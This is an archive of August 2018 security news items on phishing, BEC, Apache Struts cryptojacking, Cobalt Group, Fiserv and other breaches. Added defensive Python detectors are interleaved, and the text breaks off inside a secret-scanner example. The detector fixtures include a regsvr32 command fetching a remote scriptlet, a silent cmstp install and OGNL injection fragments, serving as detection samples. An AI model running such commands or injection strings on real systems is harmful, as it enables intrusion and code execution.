Archive for August 2018

Mobile Phishing Campaign Offered Free Flights

A campaign recently reported by Farsight Security used internationalized domain name (IDN) homograph phishing websites, whose domain names substitute visually identical non-Latin characters for Latin letters, to trick mobile users into entering their personal information. The suspected phishing websites presented as commercial airlines, specifically Delta Air Lines, easyJet and Ryanair, and offered free tickets, fooling users with the age-old bait-and-switch technique.

Users were asked to respond to a series of seemingly innocent questions and then share the free offer with 15 of their WhatsApp contacts before being directed to the URL where they could access the free tickets. After Farsight discovered the first suspected Delta phishing site, it immediately informed the company. According to Farsight researchers, the websites were optimized for mobile and failed to work smoothly on desktop, leaving mobile users as prime targets.

It’s not unusual for phishing scams to use spoofed sites and homograph domains to fool unsuspecting users with trusted brand names. “Users, especially on smaller mobile screens, may not be paying close attention to the URLs or domain names of sites to verify their legitimacy,” said Dirk Morris, chief product officer at Untangle.
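The check Morris says users skip on a small screen can be automated on the URL itself. The following is an added example, not code from Farsight or from the original article; it assumes a short, constructed brand list and an illustrative confusables table (a real deployment would use the full Unicode confusables data), and it accepts hosts in either Unicode or punycode (xn--) form:

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed list of brand labels to protect; a real deployment would load its own.
PROTECTED_BRANDS = {"delta", "easyjet", "ryanair"}

# Illustrative (not exhaustive) table of non-Latin characters that render like
# Latin letters, folded onto the letter they imitate.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic а е о р с
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",  # Cyrillic х у і ј ѕ
    "\u0501": "d", "\u04cf": "l",                                                # Cyrillic ԁ ӏ
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v", "\u03b9": "i",                  # Greek ο α ν ι
}


def script_of(ch):
    """Coarse script bucket taken from the Unicode character name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN"):
        if name.startswith(script):
            return script
    return "OTHER"


def skeleton(label):
    """Fold confusables onto Latin lookalikes (a simplified UTS #39 skeleton)."""
    folded = unicodedata.normalize("NFKC", label).lower()
    return "".join(CONFUSABLES.get(c, c) for c in folded)


def analyze_host(host):
    """Return findings for one hostname given in Unicode or punycode (xn--) form."""
    try:
        uhost = host.encode("ascii").decode("idna") if host.isascii() else host
    except UnicodeError:
        uhost = host
    findings = {"host": host, "unicode": uhost, "mixed_script": False, "lookalike_of": None}
    for label in uhost.lower().split("."):
        scripts = {script_of(c) for c in label if c.isalpha()} - {"OTHER"}
        if len(scripts) > 1:
            findings["mixed_script"] = True          # e.g. Latin d,l,t,a with a Cyrillic е
        sk = skeleton(label)
        if sk in PROTECTED_BRANDS and sk != label:
            findings["lookalike_of"] = sk            # renders like a brand but is not that label
    return findings


def is_suspicious(url):
    """True when the URL's host mixes scripts or imitates a protected brand."""
    f = analyze_host(urlsplit(url).hostname or "")
    return f["mixed_script"] or f["lookalike_of"] is not None


if __name__ == "__main__":
    for u in ("https://delta.com/", "https://d\u0435lta.com/free-tickets"):
        print(u, analyze_host(urlsplit(u).hostname))
```

The mixed-script test alone misses a label written entirely in one non-Latin script, which is why the skeleton comparison against the brand list is also needed; the two checks together catch both styles of homograph.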

Despite having been around for a while, these types of attacks remain largely successful. “Studies have shown that 95% of web-based attacks use social engineering to trick users,” said Atif Mushtaq, CEO at SlashNext.

“These types of contest phishing scams have become increasingly sophisticated, in large part because people are getting trained by their organizations to recognize fake emails, giveaway scams or imposter websites asking for credit card or login details.”

Being duped by a sophisticated phishing scam is not uncommon, but there are common signs to look for. What users need to remember is that nothing is ever really free, explained Ajay Menendez, executive director, HUNT Program at SecureSet.

“Check the 'from' email address for any signs that it might not be legitimate, and look for numbers instead of letters or common misspellings or letters that are inverted or missing. Poor spelling and grammar can be giveaways in the body of the email,” Menendez said.

“Your bank and other legitimate accounts will never ask for your social security number in an email. If you receive an email asking for this information, call your bank (and any other company who may be requesting this) to confirm. Never provide email, account information or passwords via email.”

“Many phishing scams will look very legitimate,” he said, “so even if the email looks like it comes from your cable company, be extra cautious. This is an instance where an ounce of prevention is worth a pound of cure.”

Source: Information Security Magazine

Orgs Still Feel Vulnerable Despite Cyber Standards

Even though the majority of companies across the globe have implemented cybersecurity standards, a new report from IT Governance USA found that companies still believe they are the likely target of an attack.

Since 2017, there has been a 25% increase in data breaches, according to the ISO 27001 Global Report, which also revealed that 68% of organizations are now using ISO 27001 – the international standard for best practices with information security management systems (ISMSs) – to achieve General Data Protection Regulation (GDPR) compliance. Despite this majority, cybersecurity remains a top concern for organizations worldwide.

With regard to the GDPR, the report found that 43% of companies will be implementing an ISO 27001-compliant ISMS to enable them to maintain compliance with the EU GDPR. More than half of the respondents who have already implemented this standard (57%) reportedly did so because they believed they would gain a competitive advantage.

In fact, the overwhelming majority (89%) of organizations reported that improving their information security was the single greatest benefit of implementing ISO 27001.

“Implementing an ISO 27001-compliant ISMS is not only information security best practice but is also integral to demonstrating data protection compliance,” the report stated. “Even if you do suffer a breach, regulators show leniency to organizations that have certified to ISO 27001 because they are able to demonstrate that they are following information security best practice.”

Perhaps that is why two-thirds of 128 organizations that participated in the survey believe implementing ISO 27001 improves their security posture, reflecting a 3% jump from the 2016 and 2015 reports.

“Unfortunately, as long as cybercrime remains a lucrative trade, risks will continue to escalate, and attackers will continue to proliferate,” said Alan Calder, founder and executive chairman of IT Governance. “To counter this, organizations need to be fully prepared. ISO 27001, an information security standard designed to minimize risks and mitigate damage, offers the preparedness organizations need.”

Source: Information Security Magazine

43% of Security Pros Could Execute Insider Attack

A recent survey of nearly 200 IT professionals about insider threats found that nearly half of the participants believed they could successfully attack their organizations from the inside. In a blog post earlier this week Imperva researchers reported on insider threats and revealed the findings of the recent survey.

Of the 179 IT professionals who participated in the survey, 43% said they were confident they could execute an insider attack. Only a third said carrying out an insider attack would be either difficult or impossible, while a mere 22% felt they had a 50/50 chance of successfully stealing information from the inside.

When asked how they would execute a successful insider attack, 23% said they would use their company-owned laptop to steal information from the organization, 20% would use their personal computers, and 19% would use their own laptops.

“The continued reliance on data for today’s businesses means more people within an organization have access to it,” explained Imperva CTO Terry Ray. “The result is a corresponding increase in data breaches by insiders either through intentional (stealing) or unintentional (negligent) behavior of employees and partners."

“While the most sensational headlines typically involve infiltrating an ironclad security system or an enormous and well-funded team of insurgents, the truth of how hackers are able to penetrate your system may be less obvious: it’s your employees,” he continued.

Insider threats continue to rank among the top cybersecurity concerns, and every company could potentially fall victim to an insider-related breach, whether from a malicious actor or an unintentional one.

“It’s much better to put the necessary security measures in place now than to spend millions of dollars later," Ray said. "Every company can take some basic steps in their security posture to minimize insider threats, including background checks, monitoring employee behavior, using the principle of least privilege, controlling and monitoring user access, and educating employees.”

Source: Information Security Magazine

BEC Analysis Reveals Organization-Wide Threat

Around half of those that receive and are impersonated in Business Email Compromise (BEC) scams aren’t C-level or finance/HR employees, highlighting the importance of a company-wide policy to mitigate the threat, according to new research.

Security firm Barracuda Networks analyzed 3000 BEC campaigns to better understand where and how attackers are focusing their efforts.

Sometimes referred to as “CEO fraud,” the scams often work by impersonating a company boss — either by spoofing their email domain or phishing/cracking their account — and then trying to persuade a member of the finance team to make a large corporate fund transfer to a third-party account.

However, while CEOs accounted for the largest single role impersonated in the scams (43%), an even bigger proportion (48%) came from a long tail of other roles outside the C-level, finance and HR functions.

When it came to recipients, Barracuda Networks found that 54% also came from non-C-suite, finance or HR roles. The next most popular recipients were CFOs (17%) and finance/HR staff (17%).

“As you can see, almost half of the impersonated roles and more than half of targets are not of ‘sensitive’ positions, such as executives, finance or HR,” explained Asaf Cidon, Barracuda Networks' vice-president of content security services. “Therefore, simply protecting employees in sensitive departments is not sufficient to protect against BEC.”

The research also found that only 40% of BEC emails contained a malicious link; the remaining 60% contained none, relying on social engineering in the text of the message, which makes them harder for traditional security filters to spot.

Some 47% requested a direct wire transfer, while 12% sought to establish a rapport with the recipient — presumably before requesting the transfer — and a further 12% were designed to steal personally identifiable information (PII).

Barracuda Networks recommended firms implement a combination of technology designed to combat spear-phishing, often the first stage in a BEC attack, and user education to improve awareness of scams.

Neil Larkins, CTO of Egress Software Technologies, added that AI tools can also be used to improve detection.

“By analyzing people’s email behavior, smart technology can now recognize patterns and highlight anomalies,” he said.

“In cases where a phishing email requires an individual to respond, they can be alerted to the fact they haven’t emailed this recipient before or that the recipient’s domain is not trusted — immediately raising red flags for the user in scenarios where cyber-criminals are leveraging established relationships.”
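The behavioural checks Larkins describes (first contact, untrusted or lookalike domain, a reply or payment being requested) can be implemented without any machine learning, from a record of who the user has actually emailed before. The following is an added example, not Egress's or Barracuda's code; the sent-mail history, trusted domain list and action phrases are constructed for the illustration:

```python
from email.utils import parseaddr

# Constructed outbound-mail history: address -> number of messages this user has sent it.
SENT_HISTORY = {
    "alice@partner-corp.example": 12,
    "cfo@acme.example": 40,
}
# Domains the organisation treats as known: its own plus established partners (constructed).
TRUSTED_DOMAINS = {"acme.example", "partner-corp.example"}
# Phrases that signal the mail wants an action the recipient would regret (constructed list).
ACTION_PHRASES = ("wire", "transfer", "urgent", "invoice", "gift card", "payroll", "w-2")


def edit_distance(a, b):
    """Levenshtein distance, used to spot lookalike domains such as partner-c0rp."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_inbound(msg, history=SENT_HISTORY, trusted=TRUSTED_DOMAINS):
    """Return a list of warnings for an inbound message {'from', 'subject', 'body'}."""
    display, addr = parseaddr(msg["from"])
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    warnings = []

    if addr not in history:
        warnings.append("first contact: you have never emailed %s" % addr)

    if domain and domain not in trusted:
        warnings.append("sender domain %s is not trusted" % domain)
        for t in trusted:
            if 0 < edit_distance(domain, t) <= 2:
                warnings.append("domain %s is a lookalike of trusted %s" % (domain, t))

    # Display-name impersonation: the name matches a known contact, the address does not.
    for known in history:
        local = known.split("@")[0].lower()
        if display and local in display.lower() and addr != known:
            warnings.append("display name '%s' matches %s but address is %s" % (display, known, addr))

    text = (msg["subject"] + " " + msg["body"]).lower()
    if any(p in text for p in ACTION_PHRASES):
        warnings.append("message requests a financial or urgent action")
    return warnings


def risk_score(msg):
    """Crude score: one point per warning, so a reply-required mail from a stranger stands out."""
    return len(analyze_inbound(msg))


if __name__ == "__main__":
    suspect = {"from": "Alice <alice@partner-c0rp.example>",
               "subject": "Urgent: updated wire instructions",
               "body": "Please transfer the outstanding invoice to the new account today."}
    for w in analyze_inbound(suspect):
        print("-", w)
```

Because the link-free BEC messages described above give a filter nothing to detonate, the signal here comes from the relationship data (never emailed, lookalike domain, known name on an unknown address) rather than from the message content; the phrase list only raises the score once that relationship looks wrong.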

Source: Information Security Magazine

Cryptojackers Exploit Critical Apache Struts Flaw

A critical Apache Struts vulnerability disclosed last week is being actively exploited in the wild to maliciously install a popular cryptocurrency miner on victim systems, according to researchers.

Experts at security vendor Volexity warned earlier this week that they spotted the activity shortly after a proof-of-concept exploit was made public.

“The in-the-wild attacks observed thus far appear to have been taken directly from the publicly posted PoC code. In this instance, Apache Struts is vulnerable due to an improper validation of namespace input data, and the flaw is trivial to exploit,” the firm explained.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27.”

The CVSS 10.0 vulnerability was revealed last week, with experts urging admins to patch as soon as possible to protect their systems. A different flaw in the same web application framework, CVE-2017-5638, was infamously exploited last year when Equifax failed to apply an available update, resulting in a data breach thought to have affected nearly half of all Americans.

Advice from the Apache Software Foundation is to upgrade to Struts 2.3.35 or Struts 2.5.17.

There could be more danger ahead for organizations that fail to patch promptly: the flaw enables remote code execution, so the same foothold currently being used to drop a miner could just as easily be used to take control of the targeted system or pivot further into the network.
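The mass scanning Volexity describes leaves a recognisable footprint in web-server logs: OGNL expressions placed in the namespace part of the URL, which the vulnerable versions failed to validate. The following is an added example, not Volexity's or Apache's code; it runs a simple detector over constructed access-log lines (the requests are illustrative, not captured exploit traffic), and the OGNL keyword list is an assumption to be extended from real payloads:

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format). The requests are illustrative,
# not captured exploit traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5120
203.0.113.9 - - [23/Aug/2018:10:01:05 +0000] "GET /%24%7B%28%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%7D/actionChain1.action HTTP/1.1" 302 0
198.51.100.4 - - [23/Aug/2018:10:02:11 +0000] "GET /struts/${(1+1)}/help.action HTTP/1.1" 302 0
198.51.100.5 - - [23/Aug/2018:10:03:00 +0000] "GET /static/app.css HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)
# OGNL expression delimiters; neither belongs in a Struts namespace or action path.
OGNL_DELIM = re.compile(r"[$%]\{")
# Identifiers that public OGNL payloads tend to use (assumed list, extend from real samples).
OGNL_KEYWORDS = ("#_memberAccess", "OgnlContext", "@java.lang", "getRuntime",
                 "ProcessBuilder", "#context", "#request")


def score_request(path):
    """Return (score, reasons) for one request path; 0 means nothing OGNL-like was seen."""
    decoded = unquote(unquote(path))        # attackers often double-encode the braces
    reasons = []
    if OGNL_DELIM.search(decoded):
        reasons.append("OGNL expression delimiter in path")
    for kw in OGNL_KEYWORDS:
        if kw in decoded:
            reasons.append("OGNL keyword %s" % kw)
    if reasons and decoded.endswith(".action"):
        reasons.append("targets a Struts action endpoint")
    return len(reasons), reasons


def scan_log(text):
    """Parse each log line and return the requests that scored, with source IP and reasons."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        score, reasons = score_request(m.group("path"))
        if score:
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["score"], "; ".join(hit["reasons"]))
```

Run this over the access logs of any internet-facing Struts application for the days before the patch went on; a hit tells you which hosts to treat as potentially compromised rather than merely unpatched, since the miner install observed here is only one thing the injected expression could have done.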

Recorded Future revealed it had “detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,” while Volexity claimed it has “observed multiple APT groups leveraging Apache Struts vulnerabilities to gain access to target networks.”

Trend Micro revealed in its midyear roundup report this week that detections for cryptocurrency miners rocketed 956% from the first half of 2017 to the first six months of this year.

Source: Information Security Magazine

APT Uses Spear Phishing in New Campaign

An advanced persistent threat group, active since at least 2016 and suspected of carrying out multiple attacks around the globe, is reportedly targeting institutions in Europe and Russia, according to a report released today by NETSCOUT Arbor.

On 13 August NETSCOUT’s ASERT team identified new spear-phishing campaign activity from the financially motivated hacking group Cobalt. Given that the messages appear to be coming from a trusted source, many victims fall prey to these types of campaigns in which malicious actors disguise themselves as other financial institutions. 

The phishing messages used to gain entry look as if they come from financial vendor or partner domains, increasing the likelihood of infection. In addition, the group reportedly uses tools that allow it to bypass Windows defenses.

NS Bank in Russia and Banca Comerciala Carpatica of Romania were the two phishing targets identified; one of the phishing emails was weaponized with two malicious URLs.

The first led to a malicious Word document carrying obfuscated VBA scripts, which researchers said differed from the known CVE exploits that had been used in parallel to this campaign.

The second was a binary with a JPEG extension. Researchers analyzed the binaries and found that they contained “two unique C2 servers we believe are owned and operated by the Cobalt hacking Group.”

These two malware samples suggest that the campaigns are connected to Cobalt Group. Analysis showed that a JavaScript backdoor, believed to be a stager for additional payloads, contained functionality similar to that of a previously seen variant of the same backdoor.

“This Cobalt Group actor(s) mimic financial entities or their vendors/partners in order to gain a foothold in the target’s network. Making use of separate infection points in one email with two separate C2s makes this email peculiar,” researchers wrote.

“One could speculate that this would increase the infection odds. The actor tries to hide the infection by using regsvr32.exe and cmstp.exe, which are both known for bypassing AppLocker (configuration dependent),” they continued.

"ASERT believes Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi.”
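The regsvr32.exe and cmstp.exe abuse the researchers describe is visible in process-creation telemetry, because both binaries are launched with switches that legitimate software rarely uses. The following is an added example, not ASERT's code; the events are constructed in the shape of Sysmon Event ID 1 fields (not real telemetry), and the expected INF directory and the list of suspicious parent processes are the editor's assumptions:

```python
# Constructed process-creation events shaped like Sysmon Event ID 1 fields; not real telemetry.
EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/payload.sct scrobj.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\Public\profile.inf",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp.exe C:\Windows\System32\ras\corpvpn.inf",
     "parent": r"C:\Windows\explorer.exe"},
]

# Parents that should rarely launch these binaries: Office and script hosts, as in a phishing chain.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed location of legitimate connection-profile INF files.
EXPECTED_INF_DIR = r"c:\windows\system32\ras"


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event):
    """Return reasons this event looks like an AppLocker bypass; an empty list means benign."""
    image, parent = basename(event["image"]), basename(event["parent"])
    # Whitespace splitting is enough here: the switches and the INF/scriptlet paths that matter
    # contain no spaces in these checks.
    tokens = event["cmdline"].lower().split()
    reasons = []
    if image == "regsvr32.exe":
        # regsvr32 /i:<url> scrobj.dll fetches and runs a remote scriptlet ("Squiblydoo")
        for t in tokens:
            if t.startswith("/i:") and t[3:].startswith(("http://", "https://", "\\\\")):
                reasons.append("regsvr32 /i: points at remote scriptlet %s" % t[3:])
        if "scrobj.dll" in tokens:
            reasons.append("regsvr32 loading scrobj.dll")
    elif image == "cmstp.exe":
        # cmstp /ni /s <inf> silently installs a profile; the INF can point at a COM scriptlet
        if "/ni" in tokens and "/s" in tokens:
            reasons.append("cmstp silent install (/ni /s)")
        for t in tokens:
            if t.endswith(".inf") and not t.startswith(EXPECTED_INF_DIR):
                reasons.append("INF outside %s: %s" % (EXPECTED_INF_DIR, t))
    if reasons and parent in SUSPICIOUS_PARENTS:
        reasons.append("spawned by %s" % parent)
    return reasons


def triage(events):
    """Return (index, reasons) for every event that produced at least one reason."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]


if __name__ == "__main__":
    for i, reasons in triage(EVENTS):
        print(i, EVENTS[i]["cmdline"], "->", "; ".join(reasons))
```

Both binaries are Microsoft-signed and live in System32, so a default AppLocker rule set allows them; the detection therefore has to come from the command line and the parent process, not from the image itself, which is the sense in which the researchers call the bypass "configuration dependent".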

Source: Information Security Magazine

Hundreds of Banks Exposed from Fiserv Flaw

A flaw in the web platform of Fiserv Inc., a technology services provider for financial institutions, reportedly exposed personal and financial account information on hundreds of bank websites, according to KrebsOnSecurity.

Security researcher Kristian Erik Hermansen contacted Krebs two weeks ago to report that “he’d discovered something curious while logged in to an account at a tiny local bank that uses Fiserv’s platform.” Shortly thereafter, KrebsOnSecurity contacted Fiserv, which explained that there had been an issue in “a messaging solution available to a subset of online banking clients.”

While Fiserv declined to say exactly how many financial institutions may have been impacted overall, there are reportedly 1,700 banks currently using Fiserv’s banking platform.

“Fiserv places a high priority on security, and we have responded accordingly,” a Fiserv spokesperson told Krebs.

“After receiving your email, we promptly engaged appropriate resources and worked around the clock to research and remediate the situation. We developed a security patch within 24 hours of receiving notification and deployed the patch to clients that utilize a hosted version of the solution. We will be deploying the patch this evening to clients that utilize an in-house version of the solution.”

Fiserv is a critical financial services vendor for banks around the globe. “A breach or data leak such as this could have a huge impact on not only the financial system in the US but globally as well,” said Jake Olcott, VP of strategic partnerships at BitSight Technologies.

“Hundreds of banks that leverage its solutions were impacted by this breach, demonstrating firsthand the imperative need for financial services companies to keep a close eye on the third-party vendors that have access to their data and customer information," Olcott continued.

“At a higher level, financial services companies need to make sure they are having continuous, data-driven conversations with their vendors about security efforts and procedures. Fostering a more collaborative approach to security can unite businesses and their vendors in the war against an increasingly volatile threat landscape and help safeguard all parties from leaks and breaches."

Source: Information Security Magazine

Hearing Date Set in Georgia Election Security Case

A hearing date has been set in the ongoing Georgia election cybersecurity case, Curling v. Kemp, in which Georgia citizens are seeking more secure elections in a lawsuit against Secretary of State and gubernatorial candidate Brian Kemp. The hearing is scheduled for Monday, 17 September, at 11am.

Oral arguments will take place at the US District Court in Atlanta before Judge Amy Totenberg, and David Cross, a partner at the law firm Morrison & Foerster, will represent the group of Georgia citizens who are the case’s plaintiffs.

Currently, Georgia’s voting system uses direct-recording electronic (DRE) voting machines and is one of only a handful of states with no independent paper trail, which means results cannot be audited independently of the machines’ software and leaves the electronic voting system vulnerable to election interference.

On behalf of the plaintiffs, Cross filed a brief in US federal court supporting their request for Georgia to switch to paper ballots for the November election. As part of the order filed, the Court denied the state’s motion to dismiss as to standing and immunity.

“Plaintiffs’ requested relief places all voters on an equal playing field and protects all voters against interference,” the brief said. “Defendants have provided no basis for this Court to find that the requested relief is so much more burdensome than the costly, complex, unsecure DRE-based system to warrant subjecting voters to that unreliable system.”

The plaintiffs added, “Defendants provide no basis for this Court to deny the Curling Plaintiffs’ Motion. They substitute conjecture for facts and legal authority and implicitly concede the inherent unreliability of the current DRE-based system. But they refuse to do anything about it this year. This violates the U.S. Constitution and Georgia state law and necessitates injunctive relief.”

Additionally, the plaintiffs “fully appreciate the gravity of their request” but said that “a preliminary injunction from this Court is the only way to protect their right to vote against manipulation or dilution this year.”

After the oral arguments are heard, Judge Totenberg will decide whether Georgia will have to switch to using paper ballots for the upcoming November general election, though there is no timeline yet for when a decision will follow.

Source: Information Security Magazine

Machine Identity Failings Expose Firms

Nearly all IT decision makers believe that protecting machine identities is as important as or more important than human identity management, but most struggle to deliver that protection, according to a new Forrester study.

The analyst firm was commissioned by Venafi to poll 350 global IT leaders about the challenges of securing machine identities; 80% said they are having difficulty doing so.

In this context, “machine” could mean any kind of digital entity on a network, according to Venafi vice-president of security strategy and threat intelligence, Kevin Bocek.

“This means that everything, including websites, software, applications, devices, even algorithms, are machines,” he told Infosecurity. “And every single one of them needs an identity in order to communicate with other machines securely.”

Unfortunately, while identity and access management (IAM) for human identities is maturing, protection of machine identities lags behind, and that gap represents a coming security storm.

Nearly half (47%) of respondents said protecting machine identities and human identities will be equally important to their organizations over the next 12-24 months, while 43% claimed machine identity protection will be more important.

A clear majority (70%) admitted they are tracking fewer than half of the most common types of machine identities found on their networks, such as cloud instances (56%), mobile devices (49%), SSH keys (29%) and containers and microservices (25%).

This could expose them to the risk of customer and corporate data theft, process disruption, downtime and customer attrition, the report claimed.

Bocek explained that machine identity attacks typically follow one of three methods.

“In the first, hackers steal machine identities for spoofing purposes, using them to establish themselves as trusted inside a network or to move around without being detected. Last year, for example, saw over 14,000 fake PayPal sites set up by scammers abusing machine identity to help them trick unsuspecting web users,” he said.

“The second scenario sees the misuse of machine identity to cause havoc across the victim’s entire network — a classic example of this would be the 2015 Ukrainian power grid attack when Russia managed to insert a valid SSH key into the grid and used it to shut down power across the country. Lastly, stolen machine identities are also used by hackers who want either to infiltrate an organization without being noticed and exfiltrate large amounts of data, hit targets with malware such as SQL injection attacks or cross-site scripting attacks or to escalate privileges.”

Mitigating machine identity attacks requires IT teams to gain visibility into the location of every digital entity on the network and ensure their keys and certificates are valid and up-to-date.

“Organizations need to automate the process of securing machine identities, since in today’s environment, they’re being created and used on a scale that only other machines can keep up with,” Bocek added. “For any mid- to large-size organization, centralizing and automating the discovery, replacement and remediation of all machine identities on a network is the only realistic defense.”
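One concrete form of the discovery Bocek calls for, applied to the SSH keys that only 29% of respondents track, is an inventory of authorized_keys entries across hosts: which key is trusted where, whether it is restricted to a command, and whether it is too small. The following is an added example, not Venafi's code; the hosts and keys are constructed (the blobs are structurally valid but contain dummy key material), and the 2048-bit threshold and the restriction options it looks for are the editor's assumptions:

```python
import base64
import hashlib
import shlex
import struct


def _blob(keytype, *fields):
    """Build a base64 SSH public-key blob: each field is length-prefixed (RFC 4253 string)."""
    parts = [struct.pack(">I", len(keytype)) + keytype]
    parts += [struct.pack(">I", len(f)) + f for f in fields]
    return base64.b64encode(b"".join(parts)).decode()


# Constructed keys: structurally valid blobs with dummy key material, not real keys.
KEY_DEPLOY = _blob(b"ssh-ed25519", b"\x01" * 32)
KEY_BACKUP = _blob(b"ssh-ed25519", b"\x02" * 32)
KEY_OLD_RSA = _blob(b"ssh-rsa", b"\x01\x00\x01", b"\x00" + b"\xff" * 128)   # e=65537, 1024-bit n

# Constructed authorized_keys contents for two hosts.
HOSTS = {
    "web01": [
        "ssh-ed25519 %s deploy@ci" % KEY_DEPLOY,
        'command="/usr/bin/rsync --server",no-pty,no-port-forwarding ssh-ed25519 %s backup@nas' % KEY_BACKUP,
    ],
    "db01": [
        "ssh-ed25519 %s deploy@ci" % KEY_DEPLOY,
        "ssh-rsa %s old-admin@laptop" % KEY_OLD_RSA,
    ],
}


def parse_line(line):
    """Parse one authorized_keys line into (options, keytype, blob, comment); None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = shlex.split(line)                 # keeps command="..." with spaces as one token
    for i, t in enumerate(tokens):
        if t.startswith(("ssh-", "ecdsa-", "sk-")):
            options = ",".join(tokens[:i]).split(",") if i else []
            return options, t, tokens[i + 1], " ".join(tokens[i + 2:])
    return None


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of the raw key blob."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def key_bits(keytype, blob):
    """Key size from the blob: modulus length for RSA, fixed 256 for ed25519."""
    raw, off, fields = base64.b64decode(blob), 0, []
    while off < len(raw):
        (n,) = struct.unpack(">I", raw[off:off + 4])
        fields.append(raw[off + 4:off + 4 + n])
        off += 4 + n
    if keytype == "ssh-rsa":
        return len(fields[2].lstrip(b"\x00")) * 8     # fields: type, e, n
    if keytype == "ssh-ed25519":
        return 256
    return None


def inventory(hosts):
    """Return (keys_by_fingerprint, findings) for weak, unrestricted and shared keys."""
    seen, findings = {}, []
    for host, lines in hosts.items():
        for line in lines:
            parsed = parse_line(line)
            if parsed is None:
                continue
            options, keytype, blob, comment = parsed
            fp = fingerprint(blob)
            seen.setdefault(fp, {"type": keytype, "comment": comment, "hosts": []})["hosts"].append(host)
            bits = key_bits(keytype, blob)
            if keytype == "ssh-rsa" and bits and bits < 2048:
                findings.append((host, fp, "rsa key is only %d bits" % bits))
            if not any(o.startswith("command=") or o == "restrict" for o in options):
                findings.append((host, fp, "no command= or restrict option (%s)" % comment))
    for fp, rec in seen.items():
        if len(rec["hosts"]) > 1:
            findings.append(("*", fp, "same key authorized on " + ", ".join(rec["hosts"])))
    return seen, findings


if __name__ == "__main__":
    _, found = inventory(HOSTS)
    for host, fp, why in found:
        print(host, fp, why)
```

Keying the inventory on the fingerprint rather than the comment is what exposes the shared deploy key: the comment is free text the key's owner chose, the fingerprint is the key. The same record is what a rotation job needs when a key is suspected stolen, since it lists every host on which the replacement must land.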

Source: Information Security Magazine

Chinese Hotel Breach May Have Hit 100 Million+ Customers

Chinese police are investigating a possible breach at a major hotel group which could have affected over 100 million customers.

Shanghai's Changning District police confirmed on Tuesday that it had been called in by Huazhu Group, which operates more than 3,000 hotels in hundreds of cities under 18 brands, including the foreign chains Mercure and Ibis.

The incident came to light after a dark web vendor put data allegedly stolen from the group up for sale for eight Bitcoins ($55,600).

State media claimed that 500 million records were stolen. These reportedly included 123 million registration details including names, mobile numbers and ID numbers; 130 million check-in records including names, addresses and birth dates and 240 million hotel stay records including card and mobile numbers.

Cybersecurity intelligence firm Zibao reportedly suggested the breach may have happened when the hotel’s developers uploaded a database to GitHub.

Andy Norton, director of threat intelligence at Lastline, speculated that the hackers in this case may not be experienced.

"It looks like human error is to blame for this breach. It also looks like the threat actors selling the data don't have the contacts or infrastructure to monetize the stolen IDs individually,” he explained. “It could be that speculative Google dorking resulted in a script kiddie holding this data and trying to sell it.”

Tim Mackey, technical evangelist at Synopsys, added that if the GitHub rumors are true, the hack appears to be in the same opportunistic mold as last year's Uber breach.

“Development teams using public source code systems like GitHub and public continuous integration (CI) systems like Travis-CI need to recognize that any developer activity which causes a push to a public repository or a public branch can be viewed by others,” he said.

“The increasing popularity of hosted development tools like GitHub, Jira and Travis-CI make them ideal sources of information for malicious actors.”
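The push that Zibao suspects, and that Mackey warns about, can be caught on the developer's machine before it reaches a public repository, by scanning the files in the commit for credentials and bulk personal data. The following is an added example, not code from Huazhu, GitHub or Synopsys; the file contents are constructed (the credentials and the ID number are fake), and the rule set is illustrative rather than complete:

```python
import re

# Constructed file contents as they might appear in a pushed commit; credentials are fake.
SAMPLE_FILES = {
    "config/database.yml": "production:\n  adapter: mysql2\n  host: db.internal\n  username: app\n  password: Sup3rS3cret!\n",
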